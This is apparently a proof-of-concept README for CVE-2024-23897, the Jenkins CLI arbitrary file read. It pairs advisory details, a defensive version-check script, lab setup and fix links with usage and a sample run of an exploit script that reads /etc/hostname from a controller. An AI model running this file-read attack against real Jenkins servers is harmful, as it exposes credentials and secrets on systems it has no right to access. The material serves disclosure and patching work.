
CVE-2024-23897 PoC — Jenkins Security Vulnerability

Associated Vulnerability
Title: Jenkins Security Vulnerability (CVE-2024-23897)
Description: Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Description
PoC for CVE-2024-23897
Readme
# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2
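The two affected ranges above need to be compared differently, because Jenkins weekly releases carry two version components (2.441) while LTS releases carry three (2.426.2). The following check is an added example for inventorying your own controllers; it is not part of the PoC repository. It assumes the version string comes either from an inventory list or from the `X-Jenkins` response header that a Jenkins controller sends, and the header sample below is constructed for the example.

```python
"""Affected-version check for CVE-2024-23897 (added example, not part of the PoC)."""
from typing import Dict, Optional, Tuple

# Fixed releases named in the Jenkins advisory; anything below these in its
# own release line is affected.
WEEKLY_FIXED = (2, 442)     # weekly: 2.441 and earlier affected
LTS_FIXED = (2, 426, 3)     # LTS:    2.426.2 and earlier affected


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '2.426.2' into (2, 426, 2); reject anything that is not dotted integers."""
    parts = v.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Jenkins version string: {v!r}")
    return tuple(int(p) for p in parts)


def is_lts(version: Tuple[int, ...]) -> bool:
    # Jenkins LTS releases have three components (2.426.2); weekly releases have two (2.441).
    return len(version) == 3


def is_affected(v: str) -> bool:
    """True if this Jenkins version is in an affected range for CVE-2024-23897."""
    version = parse_version(v)
    if is_lts(version):
        # Tuple comparison is lexicographic, so (2, 426, 2) < (2, 426, 3) and
        # a later LTS line such as (2, 440, 1) compares as fixed.
        return version < LTS_FIXED
    return version < WEEKLY_FIXED


def check_response_headers(headers: Dict[str, str]) -> Optional[bool]:
    """Read the X-Jenkins header from a captured response and classify it.

    Returns True (affected), False (fixed) or None when the header is absent,
    which is the case for a non-Jenkins host or a reverse proxy that strips it.
    """
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return is_affected(value)
    return None


if __name__ == "__main__":
    # Constructed sample: an inventory of controllers and one captured header set.
    inventory = ["2.441", "2.442", "2.426.2", "2.426.3", "2.440.1", "2.414.3"]
    for v in inventory:
        print(f"Jenkins {v}: {'AFFECTED' if is_affected(v) else 'fixed'}")
    sample_headers = {"X-Jenkins": "2.441", "Server": "Jetty(10.0.18)"}  # constructed
    print("header check:", check_response_headers(sample_headers))
```

An LTS controller on 2.414.3 is affected even though 2.414 is lower than 2.426, because the advisory fixes only 2.426.3 and later in the LTS line; the tuple comparison handles that without special-casing.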

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

```bash
cd docker
docker compose up -d
```

The instance will be available at `http://localhost:1234`.

## Exploitation

```bash
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```

**Example**

```bash
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed
```

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability, take a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).

## Related Links

- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability – Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)